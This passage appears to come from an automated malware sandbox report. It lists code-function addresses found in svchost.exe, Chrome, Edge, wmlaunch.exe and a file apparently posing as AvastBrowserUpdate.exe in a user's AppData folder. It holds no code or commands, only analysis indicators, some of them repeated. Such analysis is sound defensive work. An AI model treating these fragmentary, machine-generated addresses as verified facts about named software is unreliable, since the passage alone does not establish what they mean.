                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587D7E4C27_2_00007DF4587D7E4C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586ECD7427_2_00007DF4586ECD74
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458751D7C27_2_00007DF458751D7C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458797D9427_2_00007DF458797D94
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586C5E4827_2_00007DF4586C5E48
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871CF2427_2_00007DF45871CF24
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458710EA027_2_00007DF458710EA0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587AC01027_2_00007DF4587AC010
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458706FB027_2_00007DF458706FB0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586B5FA027_2_00007DF4586B5FA0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45870D05027_2_00007DF45870D050
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586B105827_2_00007DF4586B1058
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586C404027_2_00007DF4586C4040
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879EFBC27_2_00007DF45879EFBC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879DFB427_2_00007DF45879DFB4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871D10027_2_00007DF45871D100
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587040B427_2_00007DF4587040B4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45870F0C427_2_00007DF45870F0C4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871D21027_2_00007DF45871D210
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586E525427_2_00007DF4586E5254
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45878E1EC27_2_00007DF45878E1EC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871034427_2_00007DF458710344
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879F35427_2_00007DF45879F354
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586CF40827_2_00007DF4586CF408
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587AC52C27_2_00007DF4587AC52C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879C4B027_2_00007DF45879C4B0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879E4EC27_2_00007DF45879E4EC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586C250027_2_00007DF4586C2500
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45872D61027_2_00007DF45872D610
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871D66827_2_00007DF45871D668
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587056C027_2_00007DF4587056C0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE8178433_2_0000022D0AE81784
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE656C033_2_0000022D0AE656C0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE1286C33_2_0000022D0AE1286C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEBA79033_2_0000022D0AEBA790
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AF0C52C33_2_0000022D0AF0C52C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE2250033_2_0000022D0AE22500
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFE4EC33_2_0000022D0AEFE4EC
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7D66833_2_0000022D0AE7D668
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE8D61033_2_0000022D0AE8D610
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE31B5433_2_0000022D0AE31B54
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEDDC7833_2_0000022D0AEDDC78
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE85BEC33_2_0000022D0AE85BEC
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE3198C33_2_0000022D0AE3198C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE5891033_2_0000022D0AE58910
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFE90833_2_0000022D0AEFE908
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE3D8B833_2_0000022D0AE3D8B8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEF2A7C33_2_0000022D0AEF2A7C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE65A0C33_2_0000022D0AE65A0C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFA9E433_2_0000022D0AEFA9E4
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE1F9A033_2_0000022D0AE1F9A0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7CF2433_2_0000022D0AE7CF24
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE70EA033_2_0000022D0AE70EA0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE6D05033_2_0000022D0AE6D050
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE1105833_2_0000022D0AE11058
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AF0C01033_2_0000022D0AF0C010
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AF3F00833_2_0000022D0AF3F008
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE66FB033_2_0000022D0AE66FB0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFDFB433_2_0000022D0AEFDFB4
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFEFBC33_2_0000022D0AEFEFBC
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE15FA033_2_0000022D0AE15FA0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE4CD7433_2_0000022D0AE4CD74
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AF18D6433_2_0000022D0AF18D64
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE63D2833_2_0000022D0AE63D28
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE27E7433_2_0000022D0AE27E74
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFEE3C33_2_0000022D0AEFEE3C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEF7D9433_2_0000022D0AEF7D94
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE3136433_2_0000022D0AE31364
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFF35433_2_0000022D0AEFF354
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7034433_2_0000022D0AE70344
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE2F40833_2_0000022D0AE2F408
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7D10033_2_0000022D0AE7D100
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE640B433_2_0000022D0AE640B4
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE6F0C433_2_0000022D0AE6F0C4
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7D21033_2_0000022D0AE7D210
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEEE1EC33_2_0000022D0AEEE1EC
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DBBC034_2_00007FF6529DBBC0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D25D034_2_00007FF6529D25D0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DCDD034_2_00007FF6529DCDD0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D176034_2_00007FF6529D1760
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D1D6034_2_00007FF6529D1D60
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D3B7034_2_00007FF6529D3B70
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DA7A034_2_00007FF6529DA7A0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DCBA834_2_00007FF6529DCBA8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D598034_2_00007FF6529D5980
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D378034_2_00007FF6529D3780
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D38E034_2_00007FF6529D38E0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DA4E034_2_00007FF6529DA4E0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DBAF234_2_00007FF6529DBAF2
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D32C034_2_00007FF6529D32C0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D3D1034_2_00007FF6529D3D10
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DAE4034_2_00007FF6529DAE40
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DDE4034_2_00007FF6529DDE40
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DB88034_2_00007FF6529DB880
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC611B5438_2_00000217CC611B54
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC665BEC38_2_00000217CC665BEC
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6BDC7838_2_00000217CC6BDC78
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC643D2838_2_00000217CC643D28
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6D7D9438_2_00000217CC6D7D94
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6F8D6438_2_00000217CC6F8D64
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC62CD7438_2_00000217CC62CD74
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC650EA038_2_00000217CC650EA0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC607E7438_2_00000217CC607E74
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DEE3C38_2_00000217CC6DEE3C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65CF2438_2_00000217CC65CF24
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC66178438_2_00000217CC661784
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC69A79038_2_00000217CC69A790
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC5F286C38_2_00000217CC5F286C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC63891038_2_00000217CC638910
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DE90838_2_00000217CC6DE908
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61D8B838_2_00000217CC61D8B8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC5FF9A038_2_00000217CC5FF9A0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61198C38_2_00000217CC61198C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC645A0C38_2_00000217CC645A0C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DA9E438_2_00000217CC6DA9E4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61136438_2_00000217CC611364
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65034438_2_00000217CC650344
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DF35438_2_00000217CC6DF354
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC60F40838_2_00000217CC60F408
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6EC52C38_2_00000217CC6EC52C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC60250038_2_00000217CC602500
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DE4EC38_2_00000217CC6DE4EC
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC66D61038_2_00000217CC66D610
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65D66838_2_00000217CC65D668
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6456C038_2_00000217CC6456C0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6C16D438_2_00000217CC6C16D4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DDFB438_2_00000217CC6DDFB4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC646FB038_2_00000217CC646FB0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC71F00838_2_00000217CC71F008
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6EC01038_2_00000217CC6EC010
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DEFBC38_2_00000217CC6DEFBC
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6440B438_2_00000217CC6440B4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC64D05038_2_00000217CC64D050
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC5F105838_2_00000217CC5F1058
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65D10038_2_00000217CC65D100
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC64F0C438_2_00000217CC64F0C4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65D21038_2_00000217CC65D210
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6CE1EC38_2_00000217CC6CE1EC
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C1F4050_3_00000230185C1F40
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C028350_3_00000230185C0283
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C366C50_3_00000230185C366C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C272450_3_00000230185C2724
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C171650_3_00000230185C1716
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA1AD050_3_00007DF423DA1AD0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA147C50_3_00007DF423DA147C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA383850_3_00007DF423DA3838
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAAD5450_3_00007DF423DAAD54
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA5F6850_3_00007DF423DA5F68
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB2D3C50_3_00007DF423DB2D3C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB2D3C50_3_00007DF423DB2D3C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA554050_3_00007DF423DA5540
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAFB1450_3_00007DF423DAFB14
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAA91850_3_00007DF423DAA918
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAA32850_3_00007DF423DAA328
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DABD1050_3_00007DF423DABD10
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA36F050_3_00007DF423DA36F0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAB0B450_3_00007DF423DAB0B4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA769C50_3_00007DF423DA769C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB22B150_3_00007DF423DB22B1
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB22B150_3_00007DF423DB22B1
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAF25450_3_00007DF423DAF254
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA323C50_3_00007DF423DA323C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAC64050_3_00007DF423DAC640
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DACC4450_3_00007DF423DACC44
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA59DC50_3_00007DF423DA59DC
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB07E850_3_00007DF423DB07E8
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB11C450_3_00007DF423DB11C4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB11C450_3_00007DF423DB11C4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAB5A050_3_00007DF423DAB5A0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA9FAC50_3_00007DF423DA9FAC
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA1AD050_3_00007DF423DA1AD0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA147C50_3_00007DF423DA147C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA383850_3_00007DF423DA3838
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAAD5450_3_00007DF423DAAD54
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA5F6850_3_00007DF423DA5F68
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB2D3C50_3_00007DF423DB2D3C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB2D3C50_3_00007DF423DB2D3C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA554050_3_00007DF423DA5540
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAFB1450_3_00007DF423DAFB14
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAA91850_3_00007DF423DAA918
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAA32850_3_00007DF423DAA328
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DABD1050_3_00007DF423DABD10
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA36F050_3_00007DF423DA36F0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAB0B450_3_00007DF423DAB0B4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA769C50_3_00007DF423DA769C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB22B150_3_00007DF423DB22B1
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB22B150_3_00007DF423DB22B1
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAF25450_3_00007DF423DAF254
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA323C50_3_00007DF423DA323C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAC64050_3_00007DF423DAC640
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DACC4450_3_00007DF423DACC44
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA59DC50_3_00007DF423DA59DC
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB07E850_3_00007DF423DB07E8
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB11C450_3_00007DF423DB11C4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB11C450_3_00007DF423DB11C4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAB5A050_3_00007DF423DAB5A0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA9FAC50_3_00007DF423DA9FAC
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F23146652_3_7F231466
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F23066F52_3_7F23066F
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F231E7A52_3_7F231E7A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F23243A52_3_7F23243A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE313152_2_00FE3131
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FF1F4D52_2_00FF1F4D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA3497752_2_6BA34977
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0295A52_2_6BA0295A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B93ACCE52_2_6B93ACCE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA2235C52_2_6BA2235C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA3019E52_2_6BA3019E
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA1E1F052_2_6BA1E1F0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA2212D52_2_6BA2212D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA1C7FA52_2_6BA1C7FA
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA2A6E052_2_6BA2A6E0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9F466752_2_6B9F4667
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA225B952_2_6BA225B9
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA21EFE52_2_6BA21EFE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA073D952_2_6BA073D9
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9F37E452_2_6B9F37E4
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9F570452_2_6B9F5704
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0F55952_2_6BA0F559
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00E1754952_2_00E17549
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F09EE4652_2_7F09EE46
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F09E48752_2_7F09E487
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E4F0052_2_7F0E4F00
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E3F8852_2_7F0E3F88
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0947BD52_2_7F0947BD
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E47B152_2_7F0E47B1
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E8FDA52_2_7F0E8FDA
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E4E8452_2_7F0E4E84
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0D468252_2_7F0D4682
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E569152_2_7F0E5691
